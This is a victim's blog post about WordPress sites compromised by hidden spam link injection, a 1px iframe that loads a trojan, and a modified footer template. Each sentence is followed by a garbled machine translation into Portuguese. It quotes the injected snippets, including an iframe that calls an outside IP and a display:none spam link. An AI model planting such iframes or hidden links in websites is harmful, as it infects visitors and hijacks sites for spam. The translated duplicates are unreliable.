My Wordpress Hacked with Hidden Spam Injection Meu Wordpress cortou com injeção escondido spam
Three of my Wordpress blog hacked, that blogs installed on 2 different servers. Três do meu blog Wordpress cortado, que instalou em 2 blogs diferentes servidores. I was hit by the spam injection. Eu fui atingido pelo spam injecção. Spammer(s) injected long hidden links (hundreds of lines!) in blog posts and footer of my Spammer (s) injetado longo links ocultos (centenas de linhas!) No blog e no rodapé das minhas HYIP blog for revenue sharing HYIP blog para a repartição das receitas site. Spammer(s) are also inserting iframes in blog posts of my other multi register users blog. Spammer (s) são também inserir iframes no meu blog posts de outros usuários multi registo blog. That spammer(s) hacked this blog too with inject(s) hidden link of common spam words into footer only ( people can't register at this blog). Esse spammer (s) cortou também a injectar este blog (s) de ligação escondida spam comum em rodapé apenas palavras (as pessoas não podem registrar a este blog).
Blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation. Os blogs são mais prováveis atacada por algum tipo de ferramenta automatizada desde a quantidade de spam são demasiado grandes para o trabalho manual em todas as páginas spam criação.
Hidden Text Injection : The insertion was done deliberately to hide the text from display as follows (Injected into blog posts from one of my multi users blog): Injeção texto oculto: A inserção foi feito deliberadamente para ocultar o texto do seguinte modo de exibição (injectado no blog de um dos meus múltiplos usuários blog):
- <font style= "overflow: hidden; position: absolute; height: 0pt; width: 0pt" > <font style= "overflow: hidden; position: absolute; height: 0pt; width: 0pt">
- Spam words with link to spam websites Spam palavras com link para sites spam
- </font> </ font>
Iframe Injection : my other multi register users blog injected with a 1px iframe due to a vulnerability in WordPress ... Iframe Injecção: multi registrar meus outros usuários blog injectado com uma 1px iframe devido a uma vulnerabilidade no WordPress ... looks like this : olha como este:
- <!-- Traffic Statistics --> <iframe width= "1" height= "1" frameborder= "0" src= "http://xx.xxx.xx.xx/iframe/wp-stats.php" > </iframe><!-- End Traffic Statistics --> <! - Estatísticas de Tráfego -> <iframe width= "1" height= "1" frameborder= "0" src= "http://xx.xxx.xx.xx/iframe/wp-stats.php"> </ iframe ><!-- Fim de tráfego Estatísticas ->
and of course it downloads a trojan. e é claro que carrega um trojan. Its happening to a TON of blogs too. Sua acontecer a uma tonelada de blogs também.
Template Injection : Not only did the hackers insert “invisible” code into my blog posts, what had happened was my template had been hacked so that the footer had included a ton of hidden spam terms. Modelo de injecção: Não só a inserir hackers "invisível" código no meu blog posts, o que tinha acontecido era meu modelo tinha sido cortado de modo a que o rodapé tivesse incluído uma tonelada de spam termos escondido.
Number of paragraphs: 1 Número de pontos: 1
Number of words: 115,520 Número de palavras: 115.520
Number of letters and digits: 468,439 Número de letras e algarismos: 468.439
Number of characters: 595,969 Número de caracteres: 595.969
File size: 628,009 bytes Tamanho do arquivo: 628.009 bytes
Look like this : Aparência:
- <!-- ~ --><u style= "display: none" > <a href= "http://spammerdomain.ext/spampage.html" >ton of spam terms </a> </u><!-- ~ --> <! - ~ -> <u Style= "display: none"> <a href= "http://spammerdomain.ext/spampage.html"> tonelada de spam termos </ a> </ u> <! -- ~ ->
from lower credit card to porn credit card, from buy cheap car insurance to unreal auto car insurance :p de menor cartão de crédito para porn cartão de crédito, seguro de carro barato comprar a irreal auto seguros automóveis: p
Now, I'm trying to get more information and solve this problem and trying to find the answers for these questions : Agora, estou a tentar obter mais informações e resolver este problema e tentar encontrar as respostas para estas perguntas:
Why would someone want to hack my website? Porque alguém deseja cortar o meu site?
What should I do to detect and eventually block hacking attempts? O que devo fazer para detectar e, eventualmente, bloquear tentativas hacking?
What kinds of hackery going on? Que tipos de hackery acontecendo?
How to Prevent SQL Injection Attacks? Como prevenir ataques SQL Injection?
How To Repair The Damage? Como a reparar os danos?
Search Engine Effects of This Situation Search Engine efeitos desta situação
Etc.
I'll be back soon ! Volto em breve!
Update : Update:
Google temporarily removed some of my webpages from their search results. Google temporariamente removido algumas das minhas páginas de seus resultados de pesquisa. Currently pages from Atualmente a partir de páginas blog.pramudita.com are scheduled to be removed for at least 30 days. Está programada para ser removido por pelo menos 30 dias. This blog hacked too. Este blog cortou também. Spam terms inserted into footer.php of current theme and user : "wordpress" registered into that blog, also he changed these files : Spam footer.php inserido em termos de tema atual e de usuário: "wordpress" registrado em seu blog, ele também mudou esses arquivos:
- index.php
- xmlrpc.php
- wp-trackback.php and WP-e trackback.php
- wp-settings.php WP-settings.php
Top incoming search terms for this post Top incoming pesquisas para esta postagem
- Beauty and Beautiful Beleza e Beautiful : Top 10 Beauty Mistakes Made By Women Top 10 beleza erros cometidos pelas mulheres - November 23rd, 2007 -- 23 de novembro de 2007
- Calendar Calendário : Free 2008 Calendar Livre Agenda 2008 - November 27th, 2007 -- 27 de novembro de 2007
- Celebrity Celebrity : Heidi Montag in Maxim February 2008 Heidi Montag Maxim em fevereiro 2008 - January 18th, 2008 -- 18 de janeiro, 2008
- Computer Computador : List of Best Spyware, Adware, and Malware Removers Lista de Melhor spyware, adware, malware e dissolvente - April 14th, 2008 -- 14 de abril de 2008
- Energy Energia : Water Powered Car Inventors Water powered car inventores - May 30th, 2008 -- 30 de maio, 2008
- Entertainments Entretenimentos : Celebrity Fashion Special Celebrity Fashion especiais - March 25th, 2007 -- 25 de março de 2007
- Freebies Freebies : List of Best Spyware, Adware, and Malware Removers Lista de Melhor spyware, adware, malware e dissolvente - April 14th, 2008 -- 14 de abril de 2008
- General Geral : Adsense Notifier Firefox Extention Adsense Notifier extensão Firefox - December 14th, 2006 -- 14 de dezembro de 2006
- Google Adsense Google Adsense : Partial Change in Google Adsense Payee Name Parcial alteração no nome do beneficiário do Google Adsense - March 25th, 2007 -- 25 de março de 2007
- Holiday Feriado : Top Christmas Cookies Recipes Top Natal receitas - December 17th, 2007 -- 17 de dezembro de 2007
- HYIP HYIP : When Polexinvest Scam ? Quando Polexinvest truque? - February 13th, 2008 -- 13 de fevereiro, 2008
- Operating System Sistema Operacional : Windows Vista Upgrade Guide O Windows Vista Upgrade Guide - January 31st, 2007 -- 31 de janeiro de 2007
- Scam List Golpes Lista : MInvestment - February 6th, 2008 -- 6 de fevereiro, 2008
- Security Segurança : List of Best Spyware, Adware, and Malware Removers Lista de Melhor spyware, adware, malware e dissolvente - April 14th, 2008 -- 14 de abril de 2008
- SEO SEO : The Effect of PageRank on Search Engine Ranking Position O efeito de PageRank no motor de busca ranking posição - January 30th, 2007 -- 30 de janeiro de 2007
- Technology Tecnologia : Water Powered Car Inventors Water powered car inventores - May 30th, 2008 -- 30 de maio, 2008
- Web Development Desenvolvimento Web : List of Google PageRank 10 Websites Lista de 10 sites do Google PageRank - September 14th, 2007 -- 14 de setembro de 2007
- Windows Windows : Windows Vista Upgrade Guide O Windows Vista Upgrade Guide - January 31st, 2007 -- 31 de janeiro de 2007
- WordPress WordPress : My Wordpress Hacked with Hidden Spam Injection Meu Wordpress cortou com injeção escondido spam - May 12th, 2008 -- 12 de maio, 2008

































